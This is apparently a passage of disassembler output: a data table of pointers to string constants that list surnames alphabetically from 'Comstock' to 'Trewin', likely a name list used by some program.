dd offset aComstock ; "Comstock"
dd offset aConcino ; "Concino"
dd offset aCondodina ; "Condodina"
dd offset aConnors ; "Connors"
dd offset aCorey ; "Corey"
dd offset aCornish ; "Cornish"
dd offset aCosmides ; "Cosmides"
dd offset aCounter ; "Counter"
dd offset aCoutaux ; "Coutaux"
dd offset aCrawford ; "Crawford"
dd offset aCrocker ; "Crocker"
dd offset aCroshaw ; "Croshaw"
dd offset aCroxen ; "Croxen"
dd offset aCroxton ; "Croxton"
dd offset aCui ; "Cui"
dd offset aCurrier ; "Currier"
dd offset aCutler ; "Cutler"
dd offset aCvek ; "Cvek"
dd offset aCyders ; "Cyders"
dd offset aDasilva ; "daSilva"
dd offset aDaldalian ; "Daldalian"
dd offset aDaly ; "Daly"
dd offset aDAmbra ; "D'Ambra"
dd offset aDanieli ; "Danieli"
dd offset aDante ; "Dante"
dd offset aDapice ; "Dapice"
dd offset aDArcangelo ; "D'arcangelo"
dd offset aDas ; "Das"
dd offset aDasgupta ; "Dasgupta"
dd offset aDaskalu ; "Daskalu"
dd offset aDavid ; "David"
dd offset aDawkins ; "Dawkins"
dd offset aDegennaro ; "DeGennaro"
dd offset aDelapena ; "DeLaPena"
dd offset aDelEnclos ; "del'Enclos"
dd offset aDerousse ; "deRousse"
dd offset aDebroff ; "Debroff"
dd offset aDees ; "Dees"
dd offset aDefeciani ; "Defeciani"
dd offset aDelattre ; "Delattre"
dd offset aDeleonRendon ; "Deleon-Rendon"
dd offset aDelger ; "Delger"
dd offset aDellAcqua ; "Dell'acqua"
dd offset aDeming ; "Deming"
dd offset aDempster ; "Dempster"
dd offset aDemusz ; "Demusz"
dd offset aDenault ; "Denault"
dd offset aDenham ; "Denham"
dd offset aDenison ; "Denison"
dd offset aDesombre ; "Desombre"
dd offset aDeutsch ; "Deutsch"
dd offset aDFini ; "D'fini"
dd offset aDicks ; "Dicks"
dd offset aDiefenbach ; "Diefenbach"
dd offset aDifabio ; "Difabio"
dd offset aDifronzo ; "Difronzo"
dd offset aDilworth ; "Dilworth"
dd offset aDionysius ; "Dionysius"
dd offset aDirksen ; "Dirksen"
dd offset aDockery ; "Dockery"
dd offset aDoherty ; "Doherty"
dd offset aDonahue ; "Donahue"
dd offset aDonner ; "Donner"
dd offset aDoonan ; "Doonan"
dd offset aDore ; "Dore"
dd offset aDorf ; "Dorf"
dd offset aDosi ; "Dosi"
dd offset aDoty ; "Doty"
dd offset aDoug ; "Doug"
dd offset aDowsland ; "Dowsland"
dd offset aDrinker ; "Drinker"
dd offset aDSouza ; "D'souza"
dd offset aDuffin ; "Duffin"
dd offset aDurrett ; "Durrett"
dd offset aDussault ; "Dussault"
dd offset aDwyer ; "Dwyer"
dd offset aEardley ; "Eardley"
dd offset aEbeling ; "Ebeling"
dd offset aEckel ; "Eckel"
dd offset aEdley ; "Edley"
dd offset aEdner ; "Edner"
dd offset aEdward ; "Edward"
dd offset aEickenhorst ; "Eickenhorst"
dd offset aEliasson ; "Eliasson"
dd offset aElmendorf ; "Elmendorf"
dd offset aElmerick ; "Elmerick"
dd offset aElvis ; "Elvis"
dd offset aEncinas ; "Encinas"
dd offset aEnyeart ; "Enyeart"
dd offset aEppling ; "Eppling"
dd offset aErbach ; "Erbach"
dd offset aErdman ; "Erdman"
dd offset aErdos ; "Erdos"
dd offset aErez ; "Erez"
dd offset aEspinoza ; "Espinoza"
dd offset aEstes ; "Estes"
dd offset aEtter ; "Etter"
dd offset aEuripides ; "Euripides"
dd offset aEverett ; "Everett"
dd offset aFabbris ; "Fabbris"
dd offset aFagan ; "Fagan"
dd offset aFaioes ; "Faioes"
dd offset aFalcoAcosta ; "Falco-Acosta"
dd offset aFalorsi ; "Falorsi"
dd offset aFaris ; "Faris"
dd offset aFarone ; "Farone"
dd offset aFarren ; "Farren"
dd offset aFasso ; "Fasso'"
dd offset aFates ; "Fates"
dd offset aFeigenbaum ; "Feigenbaum"
dd offset aFejzo ; "Fejzo"
dd offset aFeldman ; "Feldman"
dd offset aFernald ; "Fernald"
dd offset aFernandes ; "Fernandes"
dd offset aFerrante ; "Ferrante"
dd offset aFerriell ; "Ferriell"
dd offset aFeuer ; "Feuer"
dd offset aFido ; "Fido"
dd offset aField ; "Field"
dd offset aFink ; "Fink"
dd offset aFinkelstein ; "Finkelstein"
dd offset aFinnegan ; "Finnegan"
dd offset aFiorina ; "Fiorina"
dd offset aFisk ; "Fisk"
dd offset aFitzmaurice ; "Fitzmaurice"
dd offset aFlier ; "Flier"
dd offset aFlores ; "Flores"
dd offset aFolks ; "Folks"
dd offset aForester ; "Forester"
dd offset aFortes ; "Fortes"
dd offset aFortier ; "Fortier"
dd offset aFossey ; "Fossey"
dd offset aFossi ; "Fossi"
dd offset aFrancisco ; "Francisco"
dd offset aFranklinKenea ; "Franklin-Kenea"
dd offset aFranz ; "Franz"
dd offset aFrazierDavis ; "Frazier-Davis"
dd offset aFreid ; "Freid"
dd offset aFreundlich ; "Freundlich"
dd offset aFried ; "Fried"
dd offset aFriedland ; "Friedland"
dd offset aFrisken ; "Frisken"
dd offset aFrowiss ; "Frowiss"
dd offset aFryberger ; "Fryberger"
dd offset aFrye ; "Frye"
dd offset aFujiiAbe ; "Fujii-Abe"
dd offset aFuller ; "Fuller"
dd offset aFurth ; "Furth"
dd offset aFusaro ; "Fusaro"
dd offset aGabrielli ; "Gabrielli"
dd offset aGaggiotti ; "Gaggiotti"
dd offset aGaleotti ; "Galeotti"
dd offset aGalwey ; "Galwey"
dd offset aGambini ; "Gambini"
dd offset aGarfield ; "Garfield"
dd offset aGarman ; "Garman"
dd offset aGaronna ; "Garonna"
dd offset aGeller ; "Geller"
dd offset aGemberling ; "Gemberling"
dd offset aGeorgi ; "Georgi"
dd offset aGerrett ; "Gerrett"
dd offset aGhorai ; "Ghorai"
dd offset aGibbens ; "Gibbens"
dd offset aGibson ; "Gibson"
dd offset aGilbert ; "Gilbert"
dd offset aGili ; "Gili"
dd offset aGill ; "Gill"
dd offset aGillispie ; "Gillispie"
dd offset aGist ; "Gist"
dd offset aGleason ; "Gleason"
dd offset aGlegg ; "Glegg"
dd offset aGlendon ; "Glendon"
dd offset aGoldfarb ; "Goldfarb"
dd offset aGoncalves ; "Goncalves"
dd offset aGood ; "Good"
dd offset aGoodearl ; "Goodearl"
dd offset aGoody ; "Goody"
dd offset aGozzi ; "Gozzi"
dd offset aGravell ; "Gravell"
dd offset aGreenberg ; "Greenberg"
dd offset aGreenfeld ; "Greenfeld"
dd offset aGriffiths ; "Griffiths"
dd offset aGrigoletto ; "Grigoletto"
dd offset aGrummell ; "Grummell"
dd offset aGruner ; "Gruner"
dd offset aGruppe ; "Gruppe"
dd offset aGuenthart ; "Guenthart"
dd offset aGunn ; "Gunn"
dd offset aGuo ; "Guo"
dd offset aHa ; "Ha"
dd offset aHaar ; "Haar"
dd offset aHackman ; "Hackman"
dd offset aHackshaw ; "Hackshaw"
dd offset aHaley ; "Haley"
dd offset aHalkias ; "Halkias"
dd offset aHallowell ; "Hallowell"
dd offset aHalpert ; "Halpert"
dd offset aHambarzumjan ; "Hambarzumjan"
dd offset aHamer ; "Hamer"
dd offset aHammerness ; "Hammerness"
dd offset aHand ; "Hand"
dd offset aHanssen ; "Hanssen"
dd offset aHarding ; "Harding"
dd offset aHargraves ; "Hargraves"
dd offset aHarlow ; "Harlow"
dd offset aHarrigan ; "Harrigan"
dd offset aHartman ; "Hartman"
dd offset aHartmann ; "Hartmann"
dd offset aHartnett ; "Hartnett"
dd offset aHarwell ; "Harwell"
dd offset aHaviaras ; "Haviaras"
dd offset aHawkes ; "Hawkes"
dd offset aHayes ; "Hayes"
dd offset aHaynes ; "Haynes"
dd offset aHazlewood ; "Hazlewood"
dd offset aHeermans ; "Heermans"
dd offset aHeft ; "Heft"
dd offset aHeiland ; "Heiland"
dd offset aHellman ; "Hellman"
dd offset aHellmiss ; "Hellmiss"
dd offset aHelprin ; "Helprin"
dd offset aHemphill ; "Hemphill"
dd offset aHenery ; "Henery"
dd offset aHenrichs ; "Henrichs"
dd offset aHernandez ; "Hernandez"
dd offset aHerrera ; "Herrera"
dd offset aHester ; "Hester"
dd offset aHeubert ; "Heubert"
dd offset aHeyeck ; "Heyeck"
dd offset aHimmelfarb ; "Himmelfarb"
dd offset aHind ; "Hind"
dd offset aHirst ; "Hirst"
dd offset aHitchcock ; "Hitchcock"
dd offset aHoang ; "Hoang"
dd offset aHock ; "Hock"
dd offset aHoffer ; "Hoffer"
dd offset aHoffman ; "Hoffman"
dd offset aHokanson ; "Hokanson"
dd offset aHokoda ; "Hokoda"
dd offset aHolmes ; "Holmes"
dd offset aHoloien ; "Holoien"
dd offset aHolter ; "Holter"
dd offset aHolway ; "Holway"
dd offset aHolzman ; "Holzman"
dd offset aHooker ; "Hooker"
dd offset aHopkins ; "Hopkins"
dd offset aHorsley ; "Horsley"
dd offset aHoshida ; "Hoshida"
dd offset aHostage ; "Hostage"
dd offset aHottle ; "Hottle"
dd offset aHoward ; "Howard"
dd offset aHoy ; "Hoy"
dd offset aHuey ; "Huey"
dd offset aHuidekoper ; "Huidekoper"
dd offset aHungerford ; "Hungerford"
dd offset aHuntington ; "Huntington"
dd offset aHupp ; "Hupp"
dd offset aHurtubise ; "Hurtubise"
dd offset aHutchings ; "Hutchings"
dd offset aHyde ; "Hyde"
dd offset aIaquinta ; "Iaquinta"
dd offset aIchikawa ; "Ichikawa"
dd offset aIgarashi ; "Igarashi"
dd offset aInamura ; "Inamura"
dd offset aInniss ; "Inniss"
dd offset aIsaac ; "Isaac"
dd offset aIsaievych ; "Isaievych"
dd offset aIsbill ; "Isbill"
dd offset aIsserman ; "Isserman"
dd offset aIyer ; "Iyer"
dd offset aJacenko ; "Jacenko"
dd offset aJackson ; "Jackson"
dd offset aJagers ; "Jagers"
dd offset aJagger ; "Jagger"
dd offset aJagoe ; "Jagoe"
dd offset aJain ; "Jain"
dd offset aJamil ; "Jamil"
dd offset aJanjigian ; "Janjigian"
dd offset aJarnagin ; "Jarnagin"
dd offset aJarrell ; "Jarrell"
dd offset aJay ; "Jay"
dd offset aJeffers ; "Jeffers"
dd offset aJellis ; "Jellis"
dd offset aJenkins ; "Jenkins"
dd offset aJespersen ; "Jespersen"
dd offset aJewett ; "Jewett"
dd offset aJohannesson ; "Johannesson"
dd offset aJohannsen ; "Johannsen"
dd offset aJohns ; "Johns"
dd offset aJolly ; "Jolly"
dd offset aJorgensen ; "Jorgensen"
dd offset aJucks ; "Jucks"
dd offset aJuliano ; "Juliano"
dd offset aJulious ; "Julious"
dd offset aKabbash ; "Kabbash"
dd offset aKaboolian ; "Kaboolian"
dd offset aKafadar ; "Kafadar"
dd offset aKalbfleisch ; "Kalbfleisch"
dd offset aKaligian ; "Kaligian"
dd offset aKalil ; "Kalil"
dd offset aKalinowski ; "Kalinowski"
dd offset aKalman ; "Kalman"
dd offset aKamel ; "Kamel"
dd offset aKangis ; "Kangis"
dd offset aKarpouzes ; "Karpouzes"
dd offset aKassower ; "Kassower"
dd offset aKasten ; "Kasten"
dd offset aKawachi ; "Kawachi"
dd offset aKee ; "Kee"
dd offset aKeenan ; "Keenan"
dd offset aKeepper ; "Keepper"
dd offset aKeith ; "Keith"
dd offset aKelker ; "Kelker"
dd offset aKelsey ; "Kelsey"
dd offset aKempton ; "Kempton"
dd offset aKemsley ; "Kemsley"
dd offset aKendall ; "Kendall"
dd offset aKerry ; "Kerry"
dd offset aKeul ; "Keul"
dd offset aKhong ; "Khong"
dd offset aKimmel ; "Kimmel"
dd offset aKimmett ; "Kimmett"
dd offset aKimura ; "Kimura"
dd offset aKindall ; "Kindall"
dd offset aKinsley ; "Kinsley"
dd offset aKippenberger ; "Kippenberger"
dd offset aKirscht ; "Kirscht"
dd offset aKittridge ; "Kittridge"
dd offset aKleckner ; "Kleckner"
dd offset aKleiman ; "Kleiman"
dd offset aKleinfelder ; "Kleinfelder"
dd offset aKlemperer ; "Klemperer"
dd offset aKling ; "Kling"
dd offset aKlinkenborg ; "Klinkenborg"
dd offset aKlint ; "Klint"
dd offset aKnuff ; "Knuff"
dd offset aKobrick ; "Kobrick"
dd offset aKoch ; "Koch"
dd offset aKohn ; "Kohn"
dd offset aKoivumaki ; "Koivumaki"
dd offset aKommer ; "Kommer"
dd offset aKoniaris ; "Koniaris"
dd offset aKonrad ; "Konrad"
dd offset aKool ; "Kool"
dd offset aKorzybski ; "Korzybski"
dd offset aKotter ; "Kotter"
dd offset aKovaks ; "Kovaks"
dd offset aKraemer ; "Kraemer"
dd offset aKrailo ; "Krailo"
dd offset aKrasney ; "Krasney"
dd offset aKraus ; "Kraus"
dd offset aKroemer ; "Kroemer"
dd offset aKrysiak ; "Krysiak"
dd offset aKuenzli ; "Kuenzli"
dd offset aKumar ; "Kumar"
dd offset aKusman ; "Kusman"
dd offset aKuwabara ; "Kuwabara"
dd offset aLa ; "La"
dd offset aLabunka ; "Labunka"
dd offset aLafler ; "Lafler"
dd offset aLaing ; "Laing"
dd offset aLallemant ; "Lallemant"
dd offset aLandes ; "Landes"
dd offset aLankes ; "Lankes"
dd offset aLantieri ; "Lantieri"
dd offset aLanzit ; "Lanzit"
dd offset aLaserna ; "Laserna"
dd offset aLashley ; "Lashley"
dd offset aLawless ; "Lawless"
dd offset aLecar ; "Lecar"
dd offset aLecce ; "Lecce"
dd offset aLeclercq ; "Leclercq"
dd offset aLeite ; "Leite"
dd offset aLenard ; "Lenard"
dd offset aLEnclos ; "l'Enclos"
dd offset aLesser ; "Lesser"
dd offset aLessi ; "Lessi"
dd offset aLiakos ; "Liakos"
dd offset aLidano ; "Lidano"
dd offset aLiem ; "Liem"
dd offset aLight ; "Light"
dd offset aLightfoot ; "Lightfoot"
dd offset aLim ; "Lim"
dd offset aLinares ; "Linares"
dd offset aLinda ; "Linda"
dd offset aLinder ; "Linder"
dd offset aLine_0 ; "Line"
dd offset aLinehan ; "Linehan"
dd offset aLinzee ; "Linzee"
dd offset aLippmann ; "Lippmann"
dd offset aLipponen ; "Lipponen"
dd offset aLittle ; "Little"
dd offset aLitvak ; "Litvak"
dd offset aLivernash ; "Livernash"
dd offset aLivi ; "Livi"
dd offset aLivolsi ; "Livolsi"
dd offset aLizardo ; "Lizardo"
dd offset aLocatelli ; "Locatelli"
dd offset aLongworth ; "Longworth"
dd offset aLoss ; "Loss"
dd offset aLoveman ; "Loveman"
dd offset aLowenstein ; "Lowenstein"
dd offset aLoza ; "Loza"
dd offset aLubin ; "Lubin"
dd offset aLucas ; "Lucas"
dd offset aLuciano ; "Luciano"
dd offset aLuczkow ; "Luczkow"
dd offset aLuecke ; "Luecke"
dd offset aLunetta ; "Lunetta"
dd offset aLuoma ; "Luoma"
dd offset aLussier ; "Lussier"
dd offset aLutcavage ; "Lutcavage"
dd offset aLuzader ; "Luzader"
dd offset aMa ; "Ma"
dd offset aMaccormac ; "Maccormac"
dd offset aMacdonald ; "Macdonald"
dd offset aMaceachern ; "Maceachern"
dd offset aMacintyre ; "Macintyre"
dd offset aMackenney ; "Mackenney"
dd offset aMacmillan ; "MacMillan"
dd offset aMacy ; "Macy"
dd offset aMadigan ; "Madigan"
dd offset aMaggio ; "Maggio"
dd offset aMahony ; "Mahony"
dd offset aMaier ; "Maier"
dd offset aMaineHershey ; "Maine-Hershey"
dd offset aMaisano ; "Maisano"
dd offset aMalatesta ; "Malatesta"
dd offset aMaller ; "Maller"
dd offset aMalova ; "Malova"
dd offset aManalis ; "Manalis"
dd offset aMandel ; "Mandel"
dd offset aManganiello ; "Manganiello"
dd offset aMantovan ; "Mantovan"
dd offset aMarch_0 ; "March"
dd offset aMarchbanks ; "Marchbanks"
dd offset aMarcus ; "Marcus"
dd offset aMargalit ; "Margalit"
dd offset aMargetts ; "Margetts"
dd offset aMarques ; "Marques"
dd offset aMartinez ; "Martinez"
dd offset aMartochio ; "Martochio"
dd offset aMarton ; "Marton"
dd offset aMarubini ; "Marubini"
dd offset aMass ; "Mass"
dd offset aMatalka ; "Matalka"
dd offset aMatarazzo ; "Matarazzo"
dd offset aMatsukata ; "Matsukata"
dd offset aMattson ; "Mattson"
dd offset aMauzy ; "Mauzy"
dd offset aMay_0 ; "May"
dd offset aMazzali ; "Mazzali"
dd offset aMazziotta ; "Mazziotta"
dd offset aMcbride ; "Mcbride"
dd offset aMccaffery ; "Mccaffery"
dd offset aMccall ; "Mccall"
dd offset aMcclearn ; "Mcclearn"
dd offset aMcdowell ; "Mcdowell"
dd offset aMcelroy ; "Mcelroy"
dd offset aMcfadden ; "McFadden"
dd offset aMcghee ; "Mcghee"
dd offset aMcgoldrick ; "Mcgoldrick"
dd offset aMcilroy ; "McIlroy"
dd offset aMcintosh ; "Mcintosh"
dd offset aMckenna ; "Mckenna"
dd offset aMclane ; "Mclane"
dd offset aMclaren ; "Mclaren"
dd offset aMcnealy ; "Mcnealy"
dd offset aMcnulty ; "Mcnulty"
dd offset aMeccariello ; "Meccariello"
dd offset aMemisoglu ; "Memisoglu"
dd offset aMenzies ; "Menzies"
dd offset aMerikoski ; "Merikoski"
dd offset aMerlani ; "Merlani"
dd offset aMerminod ; "Merminod"
dd offset aMerseth ; "Merseth"
dd offset aMerz ; "Merz"
dd offset aMetelka ; "Metelka"
dd offset aMetropolis ; "Metropolis"
dd offset aMeurer ; "Meurer"
dd offset aMichelman ; "Michelman"
dd offset aMiddle ; "Middle"
dd offset aMieher ; "Mieher"
dd offset aMills ; "Mills"
dd offset aMinh ; "Minh"
dd offset aMini ; "Mini"
dd offset aMinichiello ; "Minichiello"
dd offset aGonzalez ; "Gonzalez"
dd offset aMitropoulos ; "Mitropoulos"
dd offset aMittal ; "Mittal"
dd offset aMocroft ; "Mocroft"
dd offset aModestino ; "Modestino"
dd offset aMoeller ; "Moeller"
dd offset aMohr ; "Mohr"
dd offset aMoiamedi ; "Moiamedi"
dd offset aMonque ; "Monque"
dd offset aMontilio ; "Montilio"
dd offset aMooredech_ ; "MooreDeCh."
dd offset aMorani ; "Morani"
dd offset aMoreton ; "Moreton"
dd offset aMorrison ; "Morrison"
dd offset aMorrow ; "Morrow"
dd offset aMortimer ; "Mortimer"
dd offset aMosher ; "Mosher"
dd offset aMosler ; "Mosler"
dd offset aMostafavi ; "Mostafavi"
dd offset aMotooka ; "Motooka"
dd offset aMudarri ; "Mudarri"
dd offset aMuello ; "Muello"
dd offset aMugnai ; "Mugnai"
dd offset aMulkern ; "Mulkern"
dd offset aMulroy ; "Mulroy"
dd offset aMumford ; "Mumford"
dd offset aMussachio ; "Mussachio"
dd offset aNaddeo ; "Naddeo"
dd offset aNapolitano ; "Napolitano"
dd offset aNardi ; "Nardi"
dd offset aNardone ; "Nardone"
dd offset aNaviaux ; "Naviaux"
dd offset aNayduch ; "Nayduch"
dd offset aNelson ; "Nelson"
dd offset aNenna ; "Nenna"
dd offset aNesci ; "Nesci"
dd offset aNeuman ; "Neuman"
dd offset aNewfeld ; "Newfeld"
dd offset aNewlin ; "Newlin"
dd offset aNg ; "Ng"
dd offset aNi_0 ; "Ni"
dd offset aNickerson ; "Nickerson"
dd offset aNickoloff ; "Nickoloff"
dd offset aNisenson ; "Nisenson"
dd offset aNitabach ; "Nitabach"
dd offset aNotman ; "Notman"
dd offset aNuzum ; "Nuzum"
dd offset aOcougne ; "Ocougne"
dd offset aOgata ; "Ogata"
dd offset aOh ; "Oh"
dd offset aOHagan ; "O'hagan"
dd offset aOldford ; "Oldford"
dd offset aOlsen ; "Olsen"
dd offset aOlson ; "Olson"
dd offset aOlszewski ; "Olszewski"
dd offset aOMalley ; "O'malley"
dd offset aOman ; "Oman"
dd offset aOMeara ; "O'meara"
dd offset aOpel ; "Opel"
dd offset aOray ; "Oray"
dd offset aOrfield ; "Orfield"
dd offset aOrsi ; "Orsi"
dd offset aOspina ; "Ospina"
dd offset aOstrowski ; "Ostrowski"
dd offset aOttaviani ; "Ottaviani"
dd offset aOtten ; "Otten"
dd offset aOuchida ; "Ouchida"
dd offset aOvid ; "Ovid"
dd offset aPaesdealmeida ; "PaesDealmeida"
dd offset aPaine ; "Paine"
dd offset aPalayoor ; "Palayoor"
dd offset aPalepu ; "Palepu"
dd offset aPallara ; "Pallara"
dd offset aPalmitesta ; "Palmitesta"
dd offset aPanadero ; "Panadero"
dd offset aPanizzon ; "Panizzon"
dd offset aPantilla ; "Pantilla"
dd offset aPaoletti ; "Paoletti"
dd offset aParmeggiani ; "Parmeggiani"
dd offset aParris ; "Parris"
dd offset aPartridge ; "Partridge"
dd offset aPascucci ; "Pascucci"
dd offset aPatefield ; "Patefield"
dd offset aPatrick ; "Patrick"
dd offset aPattullo ; "Pattullo"
dd offset aPavetti ; "Pavetti"
dd offset aPavlon ; "Pavlon"
dd offset aPawloski ; "Pawloski"
dd offset aPaynter ; "Paynter"
dd offset aPeabody ; "Peabody"
dd offset aPearlberg ; "Pearlberg"
dd offset aPederson ; "Pederson"
dd offset aPeishel ; "Peishel"
dd offset aPenny ; "Penny"
dd offset aPereira ; "Pereira"
dd offset aPerko ; "Perko"
dd offset aPerlak ; "Perlak"
dd offset aPerlman ; "Perlman"
dd offset aPerna ; "Perna"
dd offset aPerone ; "Perone"
dd offset aPerrimon ; "Perrimon"
dd offset aPeters ; "Peters"
dd offset aPetruzello ; "Petruzello"
dd offset aPettibone ; "Pettibone"
dd offset aPettit ; "Pettit"
dd offset aPfister ; "Pfister"
dd offset aPilbeam ; "Pilbeam"
dd offset aPinot ; "Pinot"
dd offset aPlancon ; "Plancon"
dd offset aPlant ; "Plant"
dd offset aPlasket ; "Plasket"
dd offset aPlous ; "Plous"
dd offset aPo ; "Po"
dd offset aPocobene ; "Pocobene"
dd offset aPoincaire ; "Poincaire"
dd offset aPointer ; "Pointer"
dd offset aPoirier ; "Poirier"
dd offset aPolak ; "Polak"
dd offset aPolanyi ; "Polanyi"
dd offset aPolitis ; "Politis"
dd offset aPoma ; "Poma"
dd offset aPoolman ; "Poolman"
dd offset aPowers ; "Powers"
dd offset aPresper ; "Presper"
dd offset aPreucel ; "Preucel"
dd offset aPrevost ; "Prevost"
dd offset aPritchard ; "Pritchard"
dd offset aPritz ; "Pritz"
dd offset aProietti ; "Proietti"
dd offset aProthrowStith ; "Prothrow-Stith"
dd offset aPuccia ; "Puccia"
dd offset aPugh ; "Pugh"
dd offset aPynchon ; "Pynchon"
dd offset aQuaday ; "Quaday"
dd offset aQuetin ; "Quetin"
dd offset aRabe ; "Rabe"
dd offset aRabkin ; "Rabkin"
dd offset aRadeke ; "Radeke"
dd offset aRajagopalan ; "Rajagopalan"
dd offset aRaney ; "Raney"
dd offset aRangan ; "Rangan"
dd offset aRankin ; "Rankin"
dd offset aRapple ; "Rapple"
dd offset aRayport ; "Rayport"
dd offset aReddenTyler ; "Redden-Tyler"
dd offset aReedquist ; "Reedquist"
dd offset aCunningham ; "Cunningham"
dd offset aReinold ; "Reinold"
dd offset aRemak ; "Remak"
dd offset aRenick ; "Renick"
dd offset aRepetto ; "Repetto"
dd offset aResnik ; "Resnik"
dd offset aRhea ; "Rhea"
dd offset aRichmond ; "Richmond"
dd offset aRielly ; "Rielly"
dd offset aRindos ; "Rindos"
dd offset aRineer ; "Rineer"
dd offset aRish ; "Rish"
dd offset aRivera ; "Rivera"
dd offset aRobinson ; "Robinson"
dd offset aRocha ; "Rocha"
dd offset aRoesler ; "Roesler"
dd offset aRogers ; "Rogers"
dd offset aRonen ; "Ronen"
dd offset aRow ; "Row"
dd offset aRoyal ; "Royal"
dd offset aRu ; "Ru"
dd offset aRuan ; "Ruan"
dd offset aRuderman ; "Ruderman"
dd offset aRuescher ; "Ruescher"
dd offset aRush ; "Rush"
dd offset aRyu ; "Ryu"
dd offset aSabatello ; "Sabatello"
dd offset aSadler ; "Sadler"
dd offset aSafire ; "Safire"
dd offset aSahu ; "Sahu"
dd offset aSali ; "Sali"
dd offset aSamson ; "Samson"
dd offset aSanchezRamirez ; "Sanchez-Ramirez"
dd offset aSanna ; "Sanna"
dd offset aSapers ; "Sapers"
dd offset aSarin ; "Sarin"
dd offset aSartore ; "Sartore"
dd offset aSase ; "Sase"
dd offset aSatin ; "Satin"
dd offset aSatta ; "Satta"
dd offset aSatterthwaite ; "Satterthwaite"
dd offset aSawtell ; "Sawtell"
dd offset aSayied ; "Sayied"
dd offset aScarponi ; "Scarponi"
dd offset aScepan ; "Scepan"
dd offset aScharf ; "Scharf"
dd offset aScharlemann ; "Scharlemann"
dd offset aScheiner ; "Scheiner"
dd offset aSchiano ; "Schiano"
dd offset aSchifini ; "Schifini"
dd offset aSchilling ; "Schilling"
dd offset aSchmitt ; "Schmitt"
dd offset aSchossberger ; "Schossberger"
dd offset aSchuman ; "Schuman"
dd offset aSchutte ; "Schutte"
dd offset aSchuyler ; "Schuyler"
dd offset aSchwan ; "Schwan"
dd offset aSchwickrath ; "Schwickrath"
dd offset aScovel ; "Scovel"
dd offset aScudder ; "Scudder"
dd offset aSeaton ; "Seaton"
dd offset aSeeber ; "Seeber"
dd offset aSegal ; "Segal"
dd offset aSekler ; "Sekler"
dd offset aSelvage ; "Selvage"
dd offset aSen ; "Sen"
dd offset aSennett ; "Sennett"
dd offset aSeterdahl ; "Seterdahl"
dd offset aSexton ; "Sexton"
dd offset aSeyfert ; "Seyfert"
dd offset aShaikh ; "Shaikh"
dd offset aShakis ; "Shakis"
dd offset aShankland ; "Shankland"
dd offset aShanley ; "Shanley"
dd offset aShar ; "Shar"
dd offset aShatrov ; "Shatrov"
dd offset aShavelson ; "Shavelson"
dd offset aShea ; "Shea"
dd offset aSheats ; "Sheats"
dd offset aShepherd ; "Shepherd"
dd offset aSheppard ; "Sheppard"
dd offset aShepstone ; "Shepstone"
dd offset aShesko ; "Shesko"
dd offset aShia ; "Shia"
dd offset aShibata ; "Shibata"
dd offset aShimon ; "Shimon"
dd offset aSiesto ; "Siesto"
dd offset aSigalot ; "Sigalot"
dd offset aSigini ; "Sigini"
dd offset aSigna ; "Signa"
dd offset aSilverman ; "Silverman"
dd offset aSilvetti ; "Silvetti"
dd offset aSinsabaugh ; "Sinsabaugh"
dd offset aSirilli ; "Sirilli"
dd offset aSites ; "Sites"
dd offset aSkane ; "Skane"
dd offset aSkerry ; "Skerry"
dd offset aSkoda ; "Skoda"
dd offset aSloan ; "Sloan"
dd offset aSlowe ; "Slowe"
dd offset aSmilow ; "Smilow"
dd offset aSniffen ; "Sniffen"
dd offset aSnodgrass ; "Snodgrass"
dd offset aSocolow ; "Socolow"
dd offset aSolon ; "Solon"
dd offset aSomers ; "Somers"
dd offset aSommariva ; "Sommariva"
dd offset aSorabella ; "Sorabella"
dd offset aSorg ; "Sorg"
dd offset aSottak ; "Sottak"
dd offset aSoukup ; "Soukup"
dd offset aSoule ; "Soule"
dd offset aSoultanian ; "Soultanian"
dd offset aSpanier ; "Spanier"
dd offset aSparrow ; "Sparrow"
dd offset aSpaulding ; "Spaulding"
dd offset aSpeizer ; "Speizer"
dd offset aSpence ; "Spence"
dd offset aSperber ; "Sperber"
dd offset aSpicer ; "Spicer"
dd offset aSpiegelhalter ; "Spiegelhalter"
dd offset aSpiliotis ; "Spiliotis"
dd offset aSpinrad ; "Spinrad"
dd offset aStmartin ; "StMartin"
dd offset aStalvey ; "Stalvey"
dd offset aStam ; "Stam"
dd offset aStang ; "Stang"
dd offset aStassinopolus ; "Stassinopolus"
dd offset aStates ; "States"
dd offset aStatlender ; "Statlender"
dd offset aStefani ; "Stefani"
dd offset aSteiner ; "Steiner"
dd offset aStephanian ; "Stephanian"
dd offset aStepniewska ; "Stepniewska"
dd offset aStewartOaten ; "Stewart-Oaten"
dd offset aStiepock ; "Stiepock"
dd offset aStillwell ; "Stillwell"
dd offset aStock ; "Stock"
dd offset aStockton ; "Stockton"
dd offset aStockwell ; "Stockwell"
dd offset aStolzenberg ; "Stolzenberg"
dd offset aStonich ; "Stonich"
dd offset aStorer ; "Storer"
dd offset aStott ; "Stott"
dd offset aStrange ; "Strange"
dd offset aStrauch ; "Strauch"
dd offset aStreiff ; "Streiff"
dd offset aStringer ; "Stringer"
dd offset aSullivan ; "Sullivan"
dd offset aSumner ; "Sumner"
dd offset aSuo ; "Suo"
dd offset aSurdam ; "Surdam"
dd offset aSweeting ; "Sweeting"
dd offset aSweetser ; "Sweetser"
dd offset aSwindle ; "Swindle"
dd offset aTagiuri ; "Tagiuri"
dd offset aTai ; "Tai"
dd offset aTalaugon ; "Talaugon"
dd offset aTambiah ; "Tambiah"
dd offset aTandler ; "Tandler"
dd offset aTanowitz ; "Tanowitz"
dd offset aTatar ; "Tatar"
dd offset aTaveras ; "Taveras"
dd offset aTawn ; "Tawn"
dd offset aTcherepnin ; "Tcherepnin"
dd offset aTeague ; "Teague"
dd offset aTemes ; "Temes"
dd offset aTemmer ; "Temmer"
dd offset aTenney ; "Tenney"
dd offset aTerracini ; "Terracini"
dd offset aThan ; "Than"
dd offset aThavaneswaran ; "Thavaneswaran"
dd offset aTheodos ; "Theodos"
dd offset aThibault ; "Thibault"
dd offset aThisted ; "Thisted"
dd offset aThomsen ; "Thomsen"
dd offset aThroop ; "Throop"
dd offset aTierney ; "Tierney"
dd offset aTill ; "Till"
dd offset aTimmons ; "Timmons"
dd offset aTofallis ; "Tofallis"
dd offset aTollestrup ; "Tollestrup"
dd offset aTolls ; "Tolls"
dd offset aTolman ; "Tolman"
dd offset aTomford ; "Tomford"
dd offset aToomer ; "Toomer"
dd offset aTopulos ; "Topulos"
dd offset aTorresi ; "Torresi"
dd offset aTorske ; "Torske"
dd offset aTowler ; "Towler"
dd offset aToye ; "Toye"
dd offset aTraebert ; "Traebert"
dd offset aTrenga ; "Trenga"
dd offset aTrewin ; "Trewin"
